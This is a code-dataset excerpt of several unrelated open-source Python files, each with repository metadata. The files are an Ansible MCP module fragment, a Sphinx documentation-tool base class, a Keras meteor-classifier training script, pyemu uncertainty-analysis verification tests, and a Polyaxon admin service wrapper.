    """Module entry point: parse arguments, open an MCP session and dispatch."""
    argument_spec = prepare_argument_spec()
    ansible_module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
    mcp_session = await open_session(
        mcp_hostname=ansible_module.params["mcp_hostname"],
        mcp_username=ansible_module.params["mcp_username"],
        mcp_password=ansible_module.params["mcp_password"],
    )
    outcome = await entry_point(ansible_module, mcp_session)
    ansible_module.exit_json(**outcome)
def url(params):
    """Return the FRE resource URL built from connection/resource params."""
    template = "https://{mcp_hostname}/nsi/api/v1/search/fres/{freId}"
    return template.format(**params)
async def entry_point(module, session):
    """Dispatch to the module-level handler matching the requested state
    (state 'get' -> coroutine ``_get``)."""
    handler = globals()["_" + module.params["state"]]
    return await handler(module.params, session)
async def _get(params, session):
    """GET the FRE resource and normalise the response for Ansible.

    :param params: module params (connection info, freId, query options)
    :param session: an open aiohttp-style client session
    :return: the dict produced by update_changed_flag

    Fixes: the previous version left ``_json`` unbound when the response
    carried a Content-Type outside the accepted list, raising
    UnboundLocalError at the return statement; it also duplicated the URL
    format string instead of reusing the sibling ``url()`` helper.
    """
    _url = url(params) + gen_args(params, IN_QUERY_PARAMETER)
    async with session.get(_url) as resp:
        content_types = [
            "application/json-patch+json",
            "application/vnd.api+json",
            "application/json",
        ]
        # Default payload covers both a missing Content-Type header (KeyError)
        # and an unsupported one, so _json is always bound below.
        _json = {}
        try:
            if resp.headers["Content-Type"] in content_types:
                _json = await resp.json()
            else:
                print("response Content-Type not supported")
        except KeyError:
            pass
        return await update_changed_flag(_json, resp.status, "get")
if __name__ == "__main__":
    import asyncio
    # NOTE: get_event_loop()/run_until_complete is kept (rather than
    # asyncio.run) because DOCUMENTATION declares python >= 3.6 and
    # asyncio.run only exists from 3.7.
    loop = asyncio.get_event_loop()
    loop.run_until_complete(main())
| 29.885714
| 86
| 0.633604
|
4a111d490237911f0a8aa3b8aa9e18648f3da215
| 16,823
|
py
|
Python
|
doctool/partials.py
|
nam4dev/doctool
|
8b161fd099165e66862a45e56d21ff27bf521766
|
[
"MIT"
] | null | null | null |
doctool/partials.py
|
nam4dev/doctool
|
8b161fd099165e66862a45e56d21ff27bf521766
|
[
"MIT"
] | null | null | null |
doctool/partials.py
|
nam4dev/doctool
|
8b161fd099165e66862a45e56d21ff27bf521766
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "Namgyal BRISSON (nam4dev)"
__since__ = "10/25/2019"
__copyright__ = """MIT License
Copyright (c) 2019 Namgyal Brisson
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""
:summary: Defines a Partial Class to group Project (RST & API) common logic
"""
import os
import abc
import logging
from doctool import settings
from doctool.helpers import Types
from doctool.helpers import ProjectHelper
from doctool.interfaces import IProject
from doctool.interfaces import IManager
logger = logging.getLogger(__name__)
class PartialProject(IProject):
    """
    Partial Project Class
    Abstract methods:
        * setup : Must be implemented to treat all prerequisites.
        * build : Must be implemented to execute building process.
        * teardown : Must be implemented to ensure all execution process remains clean.
    Methods:
        * __getattribute__ : Append logical repo path to relative path stored in the configuration file, if so.
    Properties:
        * configuration : The global configuration dict read from the configuration file by the Manager Class.
        * id : The Unique Identifier for the project.
        * rank : The rank of the project if Mode MULTIPLE *
        * toctree : The project global "Table Of Content Tree" reference
        * manager : The Manager instance
        * helper : The Helper instance **
        * src_dirname : The Project source directory path ***
        * out_dirname : The final output directory path held by the Manager Class
        * data : A selection of data used for writing project's specification (conf.py)
            and running the underlying engine, Sphinx
    * : The ranking is active only if more than one project is to be built.
    ** : The Helper instance is either a ProjectHelper or a CodeProjectHelper instance.
    *** : The building process is done in a temporary folder not the real source directory path.
    """
    # NOTE(review): a '__metaclass__' class attribute only has an effect on
    # Python 2; on Python 3 the metaclass must be passed in the class header
    # (e.g. metaclass=abc.ABCMeta) — confirm which runtime this targets.
    __metaclass__ = abc.ABCMeta
    def __getattribute__(self, attr):
        """
        Override.
        By applying a naming convention to some attributes, those would be automatically concatenated to
        The Documentation Base Source Directory.
        :param attr: The Attribute name to be looked up in the __dict__ instance.
        :type attr: str
        :return: The Associated value
        :rtype: object
        """
        returned = None
        # NOTE(review): super(IProject, self) starts the MRO lookup ABOVE
        # IProject (not above PartialProject) — presumably intentional to skip
        # any IProject-level hook; confirm.
        default = super(IProject, self).__getattribute__(attr)
        # Convention: attributes whose names start with '_dir' hold paths that
        # may be relative to the repository base; they are resolved against
        # settings.REPO_BASE when the resolved path actually exists. Because
        # this keys off attribute NAMES, renaming any '_dir*' attribute would
        # silently change path resolution.
        if attr.startswith('_dir'):
            possible_path = self.helper.absjoin(settings.REPO_BASE, default)
            if os.path.exists(possible_path):
                returned = possible_path
            else:
                returned = default
        # FIXME: Seems not to be used anymore?!
        # elif attr.startswith('_set'):
        #     returned = set()
        #     for p in attr:
        #         possible_path = self.helper.absjoin(settings.REPO_BASE, p)
        #         if os.path.exists(possible_path):
        #             returned.add(possible_path)
        #         else:
        #             returned.add(p)
        return returned or default
    def __str__(self):
        # Dump every non-dunder instance attribute as 'name : value' lines.
        string = u''
        for attr, value in self.__dict__.items():
            if not attr.startswith('__'):
                string += u'{0} : {1}\n'.format(attr, value)
        return string
    __repr__ = __str__
    def __init__(self, manager, configuration):
        """
        Constructor
        :param manager: The ProjectManager instance
        :type manager: ProjectManager
        :param configuration: The Project Configuration data
        :type configuration: dict
        """
        # Asserting we passe a Manager instance which respect the Interface Contract
        # NOTE(review): 'assert' statements are stripped under 'python -O'; an
        # explicit TypeError would survive optimized runs.
        assert issubclass(manager.__class__, IManager), ("You must pass in a derived Class instance "
                                                         "from IManager Interface")
        # Keeping a reference on the Manager instance.
        self._manager = manager
        # The project Configuration dictionary
        # self._configuration = Types.AttributeDict(configuration)
        self._configuration = self.load(configuration)
        # Pre routines are python routines to be executed before running sphinx builder
        self._pre_routines = self._configuration.get('pre_routines') or []
        # Post routines are python routines to be executed before running sphinx builder
        self._post_routines = self._configuration.get('post_routines') or []
        # The project is the home page and it should appear in the navigation bar)?
        self.nav = self._configuration.get('nav', False)
        # The project is the home page?
        self.home = self._configuration.get('home', False)
        # Allow to display or hide left/right menu
        self.menu = self._configuration.get('menu', {"left": True, "right": True})
        # Is this project included in the search bar
        self.search = self._configuration.get('search', True)
        # The maximum depth for Toc tree recursion (default to 3)
        # lower-cased `maxdepth` is the project-level key, whereas upper-cased one is the global-level.
        self._maxdepth = self._configuration.get('maxdepth', self._configuration.get('MAXDEPTH', 3))
        # Optional project's icon
        self.icon = self._configuration.get('icon')
        # Optional project's layout
        # Possible values:
        #   - 3-columns
        #   - 2-columns-left
        #   - 2-columns-right
        self.layout = self._configuration.get('layout')
        # The project Unique Identifier
        self._uid = self._configuration.get('id', self._default_uid)
        # The project's name (from Configuration file)
        self._name = self._configuration.name
        # The project output format {HTML, PDF, WORD, ...} received from the Commandline
        self._output_format = manager.output_format
        # The project Ranking index
        self._rank = self._configuration.rank
        # The project source directory
        self._dir_source = self._configuration.dir2parse
        # The Project's extra paths to be appended to the module `sys.path`
        # Relative entries are resolved against the project source directory;
        # entries that do not exist are dropped with a warning.
        extra_paths = []
        for path in self._configuration.get('extra_sys_paths') or []:
            if not os.path.isabs(path):
                path = ProjectHelper.absjoin(self._dir_source, path)
            if os.path.exists(path):
                extra_paths.append(path)
            else:
                logger.warning('Extra sys path %s does not exist!', path)
        self._extra_paths = extra_paths
        # The Project's HTML static paths to be appended to the `html_static_path` var in the conf.py file
        self._html_static_paths = self._configuration.get('html_static_paths') or []
        # The Project's metadata (theme, title, copyright, ...
        self._metadata = self._configuration.metadata
        # The Project's Type
        self._is_api = self._configuration.api
        # The Project's suffix for ReSt file(s) {rst|rest|...}
        self._suffix = self._configuration.get('suffix', 'rst')
        # The Project's suffix for ReSt file(s) {rst|rest|...}
        self._override = self._configuration.get('override', True)
        # The Project TOC tree mapping
        self._toctree = None
        # The Project TOC first valid link
        self._first_link = ""
        # Public attribute for Theme Support
        self.theme = manager.theme
    @property
    def _default_uid(self):
        """
        Property computing based on path to parse
        the Project's UID
        :rtype: str
        :return: The project's UID
        """
        dir2parse = self.helper.normpath(
            self._configuration.dir2parse
        ).replace('/', ' ').strip()
        return self.helper.slugify(dir2parse)
    @property
    def configuration(self):
        """
        Holds the project's configuration Types.AttributeDict
        :return: the project's configuration
        :rtype: Types.AttributeDict
        """
        return self._configuration
    @property
    def pre_routines(self):
        """
        Property computing pre routine paths
        :return: Computed pre routine paths
        :rtype: list
        """
        # NOTE(review): this resolution logic is duplicated in post_routines;
        # kept duplicated here to leave runtime behavior untouched.
        pre_routines = []
        for routine in self._pre_routines:
            if not os.path.isabs(routine):
                pre_routines.append(
                    os.path.abspath(os.path.join(self.src_dirname, routine))
                )
            else:
                pre_routines.append(routine)
        return pre_routines
    @property
    def post_routines(self):
        """
        Property computing post routine paths
        :return: Computed post routine paths
        :rtype: list
        """
        post_routines = []
        for routine in self._post_routines:
            if not os.path.isabs(routine):
                post_routines.append(
                    os.path.abspath(os.path.join(self.src_dirname, routine))
                )
            else:
                post_routines.append(routine)
        return post_routines
    @property
    def dryrun(self):
        """
        If set the whole process is run without any physical action on the disk
        :return: Whether or not the process must be run "dry" or not
        :rtype: bool
        """
        return self._configuration.get('dry_run', False)
    @property
    def maxdepth(self):
        """
        The maximum depth for Toc tree recursion (default to 3)
        :rtype: int
        :return: maximum depth
        """
        return self._maxdepth
    @property
    def is_api(self):
        """
        Holds the project's type
        :return: Whether or not the project is of API type
        :rtype: bool
        """
        return self._is_api
    @property
    def name(self):
        """
        Holds the project's Name string
        :return: the project's Name string
        :rtype: str
        """
        return self._name
    @property
    def slug(self):
        """
        Holds the project's Name string as a slug
        :return: the project's Name' Slug string
        :rtype: str
        """
        return self.helper.slugify(self.name)
    @property
    def id(self):
        """
        Holds the project's UID string
        :return: the project's UID string
        :rtype: str
        """
        return self._uid
    @property
    def suffix(self):
        """
        Holds the project's for ReSt file(s) extension
        :return: the project's ReSt file(s) extension
        :rtype: str
        """
        return self._suffix
    @property
    def override(self):
        """
        Holds whether project's generation file(s) must be override or not
        :return: the project's override condition
        :rtype: bool
        """
        return self._override
    @property
    def rank(self):
        """
        Holds the project's Rank integer
        :return: the project's Rank integer
        :rtype: int
        """
        return self._rank
    @property
    def extra_paths(self):
        """
        Holds the Project's Extra Paths to be appended to the `sys.path` module
        :return: the project's Extra Paths
        :rtype: list
        """
        return self._extra_paths
    @property
    def html_static_paths(self):
        """
        Holds the Project's HTML static Paths
        to be appended to the `html_static_path` var in the conf.py file
        :rtype: list
        :return: the project's HTML static Paths
        """
        return self._html_static_paths
    @property
    def metadata(self):
        """
        Holds the project's Metadata
        :return: the project's Metadata
        :rtype: Types.AttributeDict
        """
        return Types.AttributeDict(self._metadata)
    @property
    def toctree(self):
        """
        Holds the project's Table of contents (TOC) tree
        :return: A dictionary containing all mapped links and
            its associated values tuple(abspath, relpath)
        :rtype: Types.AttributeDict
        """
        return self._toctree
    @property
    def first_link(self):
        """
        Holds the project's TOC tree first valid link
        :return: the project's TOC tree first valid link
        :rtype: str
        """
        return self._first_link
    @property
    def manager(self):
        """
        Wraps Main Manager instance into a clearer self property if needed
        :return: IManager subclass instance
        :rtype: ProjectManager
        """
        return self._manager
    @property
    def helper(self):
        """
        Wraps Main Manager Helper instance into a clearer self property if needed
        :return: ProjectHelper instance
        """
        return self._manager.helper
    @property
    def src_dirname(self):
        """
        Abstract property
        Should implement a way to retrieve the project's source dirname
        :return: The Project's source dirname
        :rtype: str
        """
        assert os.path.exists(self._dir_source), "The Base directory does NOT exists ! ({0})".format(self._dir_source)
        assert os.path.isdir(self._dir_source), "The Base directory is NOT a directory ! ({0})".format(self._dir_source)
        return self.helper.normpath(self._dir_source)
    @property
    def data(self):
        """
        Export this instance as a dictionary
        :return: Self as a dictionary minus some non-useful attributes
        :rtype: Types.AttributeDict
        """
        return self.manager.data_context_builder(
            uid=self.id,
            project_name=self.name,
            master_doc='index',
            output_dir=self.helper.absjoin(self.manager.output_dir, self.id),
            source_dir=self.src_dirname,
            output_format=self._output_format,
            extra_paths=self.extra_paths,
            html_static_paths=self.html_static_paths,
            metadata=self.metadata,
            theme=self.theme
        )
    @property
    def conf_filename(self):
        """
        Property holding the Configuration filename
        Typically the `conf.py` for Sphinx
        :return: The Configuration filename
        :rtype: str or unicode
        """
        return self.helper.absjoin(self.src_dirname, 'conf.py')
    def build_toctree(self, source_dir):
        """
        Builds the Project's Toctree according the context
        :param source_dir: The source directory
        """
        self._toctree = []
        index = self.helper.absjoin(source_dir, 'index.rst')
        # Without an index.rst the toctree stays empty and first_link keeps "".
        if os.path.isfile(index):
            with open(index, 'r') as handle:
                index_lines = handle.readlines()
            toctree = Types.TOCList(
                index_lines,
                maxdepth=self.maxdepth,
                src_dirname=source_dir,
                suffix=self.id
            )
            self._toctree = toctree.build().items
            self._first_link = toctree.first_link
    @classmethod
    def load(cls, configuration):
        """
        Loads from filesystem the configuration file into memory.
        :param configuration: The Configuration minimal data got from the global Configuration file.
        :type configuration: dict
        :return: The configuration data
        :rtype: Types.AttributeDict
        """
        return ProjectHelper.load_from_file(configuration)
    @abc.abstractmethod
    def setup(self):
        """
        Abstract Method
        The building process
        """
    @abc.abstractmethod
    def build(self):
        """
        Abstract Method
        The building process
        """
    @abc.abstractmethod
    def teardown(self):
        """
        Abstract Method
        The building process
        """
| 31.801512
| 120
| 0.616656
|
4a111d8595893cedd6547bd4eab5f0bd3c559494
| 6,264
|
py
|
Python
|
results/results_2/model_2_07/results_2_07_code.py
|
ibrahimoa/meteor_classification
|
4f6267944562f81546bf5fd5e7a5f568bd2e24a5
|
[
"CC0-1.0"
] | null | null | null |
results/results_2/model_2_07/results_2_07_code.py
|
ibrahimoa/meteor_classification
|
4f6267944562f81546bf5fd5e7a5f568bd2e24a5
|
[
"CC0-1.0"
] | 2
|
2021-06-07T10:14:07.000Z
|
2021-06-18T15:12:49.000Z
|
results/results_2/model_2_07/results_2_07_code.py
|
ibrahimoa/meteor_classification
|
4f6267944562f81546bf5fd5e7a5f568bd2e24a5
|
[
"CC0-1.0"
] | null | null | null |
import tensorflow as tf
from tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
import numpy as np
import matplotlib.pyplot as plt
from os.path import join
from os import listdir
import multiprocessing
from performanceMeasure import getPerformanceMeasures, plotAccuracyAndLoss
def trainCNN( ):
tf.keras.backend.clear_session()
modelNumber = 'model_2_07'
base_dir = 'C:\work_dir\meteorData\extraData_70_30'
results_dir = join('G:\GIEyA\TFG\meteor_classification\\results_2', modelNumber)
results_dir_weights = join(results_dir, 'weights')
train_dir = join(base_dir, 'train')
validation_dir = join(base_dir, 'validation')
ImageResolution = (432, 432)
ImageResolutionGrayScale = (432, 432, 1)
# Training -> 62483 (3905x16)
# Validation -> 26780 (1673x16)
training_images = len(listdir(join(train_dir, 'meteors'))) + len(listdir(join(train_dir, 'non_meteors')))
validation_images = len(listdir(join(validation_dir, 'meteors'))) + len(listdir(join(validation_dir, 'non_meteors')))
batch_size = 20
steps_per_epoch = int(training_images / batch_size)
validation_steps = int(validation_images / batch_size)
#Rescale all images by 1./255
train_datagen = ImageDataGenerator(rescale=1.0/255)
validation_datagen = ImageDataGenerator(rescale=1.0/255.)
train_generator = train_datagen.flow_from_directory(train_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
validation_generator = validation_datagen.flow_from_directory(validation_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
# elu activation vs relu activation -> model_2_02 and model_2_03
# dropout evaluation: model_2_02 (dropout .3) vs model_2_06 (no dropout) vs model_2_07 (dropout .4):
model = tf.keras.models.Sequential([
Conv2D(16, (7, 7), activation='elu', input_shape=ImageResolutionGrayScale, strides=1),
Conv2D(16, (7, 7), activation='elu', input_shape=ImageResolutionGrayScale, strides=1),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(32, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Flatten(),
Dense(864, activation='elu', kernel_initializer='he_uniform'),
Dropout(0.40),
Dense(16, activation='elu', kernel_initializer='he_uniform'),
Dropout(0.30),
Dense(1, activation='sigmoid', kernel_initializer='he_uniform')
])
print(model.summary())
optimizer = Adam(learning_rate=5e-4)
model.compile(optimizer=optimizer,
loss='binary_crossentropy',
metrics=['accuracy'])
class SaveModelCallback(Callback):
    """Keras callback that saves the model weights at the end of any epoch
    where BOTH training and validation accuracy clear their thresholds.

    NOTE(review): relies on `model`, `results_dir_weights`, `modelNumber`
    and `join` from the enclosing scope -- confirm they are defined there.
    """

    def __init__(self, thresholdTrain, thresholdValid):
        super(SaveModelCallback, self).__init__()
        # Minimum training accuracy required before weights are persisted.
        self.thresholdTrain = thresholdTrain
        # Minimum validation accuracy required before weights are persisted.
        self.thresholdValid = thresholdValid

    def on_epoch_end(self, epoch, logs=None):
        # Save only when both metrics pass; the filename embeds the two
        # (truncated) accuracies so successive saves do not collide.
        if((logs.get('accuracy') >= self.thresholdTrain) and (logs.get('val_accuracy') >= self.thresholdValid)):
            model.save_weights(join(results_dir_weights, modelNumber + '_acc_' + str(logs.get('accuracy'))[0:5]
                               + '_val_acc_' + str(logs.get('val_accuracy'))[0:5] + '.h5'), save_format='h5')
callback_84_84 = SaveModelCallback(0.840, 0.840)
history = model.fit(train_generator,
validation_data=validation_generator,
steps_per_epoch=steps_per_epoch,
epochs=15, #Later train with more epochs if neccessary
validation_steps=validation_steps,
shuffle=True,
verbose=1,
callbacks=[callback_84_84])
################################# PRINT MODEL PERFORMANCE AND GET PERFORMANCE MEASURES #################################
# Get performance measures:
getPerformanceMeasures(model, validation_dir, ImageResolution, join(results_dir, 'performance_' + modelNumber + '.txt'), threshold=0.50)
# Plot Accuracy and Loss in both train and validation sets
plotAccuracyAndLoss(history)
#########################################################################################################################
if __name__ == '__main__':
    # Run training in a child process; join() blocks until it finishes so
    # framework resources are fully released when the process exits.
    p = multiprocessing.Process(target=trainCNN)
    p.start()
    p.join()
| 45.064748
| 140
| 0.600415
|
4a111d88e55122bbcf43fed6eee83481d4aba946
| 4,895
|
py
|
Python
|
autotest/verf_test.py
|
hwreeves-USGS/pyemu
|
6b443601fbb9bcb9e97a8c200a78480c11c51f22
|
[
"BSD-3-Clause"
] | 94
|
2015-01-09T14:19:47.000Z
|
2022-03-14T18:42:23.000Z
|
autotest/verf_test.py
|
hwreeves-USGS/pyemu
|
6b443601fbb9bcb9e97a8c200a78480c11c51f22
|
[
"BSD-3-Clause"
] | 184
|
2020-05-29T14:25:23.000Z
|
2022-03-29T04:01:42.000Z
|
autotest/verf_test.py
|
hwreeves-USGS/pyemu
|
6b443601fbb9bcb9e97a8c200a78480c11c51f22
|
[
"BSD-3-Clause"
] | 51
|
2015-01-14T15:55:11.000Z
|
2021-12-28T17:59:24.000Z
|
import os
import numpy as np
#import matplotlib.pyplot as plt
import pandas as pd
import pyemu
# Forecast (prediction) names shared by all verification tests below.
predictions = ["sw_gw_0","sw_gw_1","or28c05_0","or28c05_1"]
# Posterior parameter covariance matrix produced by the PEST benchmark run.
post_mat = os.path.join("verf_results","post.cov")
# Directory holding the PEST-generated benchmark outputs.
verf_dir = "verf_results"
# Base path (no extension) of the Freyberg model's jco/pst files.
ord_base = os.path.join(verf_dir,"freyberg_ord")
# Scratch directory used by the test suite.
if not os.path.exists("temp"):
    os.mkdir("temp")
def predunc7_test():
    """Check pyemu's Schur posterior covariance against the PREDUNC7 benchmark."""
    benchmark_cov = pyemu.Cov.from_ascii(post_mat)
    schur = pyemu.Schur(jco=ord_base + ".jco", predictions=predictions)
    # Element-wise absolute difference between the two covariance matrices.
    difference = benchmark_cov - schur.posterior_parameter
    delta_sum = np.abs(difference.x).sum()
    print("delta matrix sum: {0:15.6E}".format(delta_sum))
    assert delta_sum < 1.0e-4
def predunc1_test():
    """Check pyemu forecast uncertainties against the PREDUNC1 benchmark."""
    schur = pyemu.Schur(jco=ord_base + ".jco", predictions=predictions)
    summary = schur.get_forecast_summary()
    # Work in standard deviations rather than variances.
    summary.loc[:, ["prior_var", "post_var"]] = summary.loc[:, ["prior_var", "post_var"]].apply(np.sqrt)

    # load the predunc1 results
    benchmark = pd.read_csv(os.path.join(verf_dir, "predunc1_results.dat"))
    benchmark.index = ["prior_var", "post_var"]

    for forecast_name in summary.index:
        bench_prior, bench_post = benchmark.loc[:, forecast_name]
        pr, pt = summary.loc[forecast_name, ["prior_var", "post_var"]].values
        pr_diff = np.abs(pr - bench_prior)
        pt_diff = np.abs(pt - bench_post)
        print("forecast:", forecast_name, "prior diff:{0:15.6E}".format(pr_diff),
              "post diff:{0:15.6E}".format(pt_diff))
        assert pr_diff < 1.0e-3
        assert pt_diff < 1.0e-3
def predvar1b_test():
    """Check pyemu error-variance components against the PREDVAR1B benchmark.

    Loads one PREDVAR1B ``.out`` table per forecast (identifiability files
    excluded) and compares the three error-variance terms over the first 13
    singular values.
    """
    out_files = [os.path.join(verf_dir,f) for f in os.listdir(verf_dir) if f.endswith(".out") and "ident" not in f]
    pv1b_results = {}
    for out_file in out_files:
        pred_name = os.path.split(out_file)[-1].split('.')[0]
        # Use a context manager so the handle is closed even if loadtxt
        # raises (the original leaked the open file).
        with open(out_file, 'r') as f:
            # Skip the three header lines before the numeric table.
            for _ in range(3):
                f.readline()
            arr = np.loadtxt(f)
        pv1b_results[pred_name] = arr

    pst = pyemu.Pst(ord_base+".pst")
    # Treat the well-flux ("wf") parameters as omitted parameters.
    omitted_parameters = [pname for pname in pst.parameter_data.parnme if pname.startswith("wf")]
    la_ord_errvar = pyemu.ErrVar(jco=ord_base+".jco",
                                 predictions=predictions,
                                 omitted_parameters=omitted_parameters,
                                 verbose=False)
    df = la_ord_errvar.get_errvar_dataframe(np.arange(36))

    # Compare only the first 13 singular values.
    max_idx = 13
    for ipred, pred in enumerate(predictions):
        arr = pv1b_results[pred][:max_idx,:]
        first = df[("first", pred)][:max_idx]
        second = df[("second", pred)][:max_idx]
        third = df[("third", pred)][:max_idx]
        # Benchmark column 0 is the singular-value index; columns 1-3 hold
        # the three error-variance terms.
        first_diff = (np.abs(arr[:,1] - first)).sum()
        second_diff = (np.abs(arr[:,2] - second)).sum()
        third_diff = (np.abs(arr[:,3] - third)).sum()
        print(pred, first_diff, second_diff, third_diff)
        assert first_diff < 1.5
        assert second_diff < 1.5
        assert third_diff < 1.5
def ident_test():
    """Check pyemu parameter identifiability against the IDENTPAR benchmark."""
    benchmark = pd.read_csv(os.path.join(verf_dir, "ident.out"),
                            delim_whitespace=True, index_col="parameter")
    errvar = pyemu.ErrVar(jco=ord_base + ".jco",
                          predictions=predictions,
                          verbose=False)
    # Identifiability computed over the first 5 singular values.
    ident_df = errvar.get_identifiability_dataframe(5)
    for pname in benchmark.index:
        expected = benchmark.loc[pname, "identifiability"]
        actual = ident_df.loc[pname, "ident"]
        gap = np.abs(expected - actual)
        print(pname, expected, actual)
        assert gap < 1.0E-3, "{0}:{1}".format(pname, gap)
def pnulpar_test():
    """Check pyemu's null-space projection of a parameter ensemble against
    PEST's PNULPAR results."""
    pst = pyemu.Pst(ord_base+".pst")

    # load the pnulpar projected ensemble
    d = os.path.join(verf_dir,"proj_par_draws")
    par_files = [ os.path.join(d,f) for f in os.listdir(d) if f.startswith("draw_")]
    pnul_en = pyemu.ParameterEnsemble.from_parfiles(pst=pst,parfile_names=par_files)
    #pnul_en.read_parfiles_prefix(os.path.join(verf_dir,"proj_par_draws","draw_"))
    pnul_en.loc[:,"fname"] = pnul_en.index
    #pnul_en.index = pnul_en.fname.apply(lambda x:str(int(x.split('.')[0].split('_')[-1])))
    # Drop the helper filename column before comparing values.
    f = pnul_en.pop("fname")

    mc = pyemu.MonteCarlo(jco=ord_base+".jco")
    # Load the corresponding prior (unprojected) draws.
    d = os.path.join(verf_dir, "prior_par_draws")
    par_files = [os.path.join(d, f) for f in os.listdir(d) if f.startswith("draw_")]
    #mc.parensemble.read_parfiles_prefix(os.path.join(verf_dir,"prior_par_draws","draw_"))
    mc.parensemble = pyemu.ParameterEnsemble.from_parfiles(pst=mc.pst,parfile_names=par_files)
    mc.parensemble.loc[:,"fname"] = mc.parensemble.index
    #mc.parensemble.index = mc.parensemble.fname.apply(lambda x:str(int(x.split('.')[0].split('_')[-1])))
    f = mc.parensemble.pop("fname")

    # Project the prior ensemble onto the null space (1 singular vector)
    # and compare, element-wise, as a percent difference.
    en = mc.project_parensemble(nsing=1,inplace=False)
    diff = 100 * (np.abs(pnul_en - en) / en)
    assert max(diff.max()) < 1.0e-3
if __name__ == "__main__":
    # Only the projection test runs by default; uncomment to run the others.
    #predunc7_test()
    #predunc1_test()
    #predvar1b_test()
    #ident_test()
    pnulpar_test()
| 37.653846
| 115
| 0.638407
|
4a111e481264ea2f2f7c1097aa1a982cdab129e2
| 473
|
py
|
Python
|
platform/core/polyaxon/administration/__init__.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
platform/core/polyaxon/administration/__init__.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
platform/core/polyaxon/administration/__init__.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
from hestia.service_interface import LazyServiceWrapper
from django.conf import settings
from administration.service import AdminService
def get_admin_backend():
    """Return the dotted path of the configured admin service backend.

    Falls back to the bundled AdminService when the ADMIN_BACKEND setting
    is unset or empty.
    """
    configured = settings.ADMIN_BACKEND
    if configured:
        return configured
    return 'administration.service.AdminService'
def get_admin_options():
    """Return the keyword options used to initialise the admin backend."""
    admin_models = settings.ADMIN_MODELS
    return dict(models=admin_models)
# Lazily-initialised admin service: the concrete backend class is resolved
# from settings on first use, and its public API is re-exported from this
# module via expose().
backend = LazyServiceWrapper(
    backend_base=AdminService,
    backend_path=get_admin_backend(),
    options=get_admin_options()
)
backend.expose(locals())
| 21.5
| 74
| 0.79704
|
4a111e78dd7a53c9191820414c26b11c10b3b15b
| 1,710
|
py
|
Python
|
lib/surface/pubsub/subscriptions/get_iam_policy.py
|
kustodian/google-cloud-sdk
|
b6bae4137d4b58030adb3dcb1271216dfb19f96d
|
[
"Apache-2.0"
] | null | null | null |
lib/surface/pubsub/subscriptions/get_iam_policy.py
|
kustodian/google-cloud-sdk
|
b6bae4137d4b58030adb3dcb1271216dfb19f96d
|
[
"Apache-2.0"
] | 11
|
2020-02-29T02:51:12.000Z
|
2022-03-30T23:20:08.000Z
|
lib/surface/pubsub/subscriptions/get_iam_policy.py
|
kustodian/google-cloud-sdk
|
b6bae4137d4b58030adb3dcb1271216dfb19f96d
|
[
"Apache-2.0"
] | 1
|
2020-07-24T18:47:35.000Z
|
2020-07-24T18:47:35.000Z
|
# -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cloud Pub/Sub subscriptions get-iam-policy command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.pubsub import subscriptions
from googlecloudsdk.calliope import base
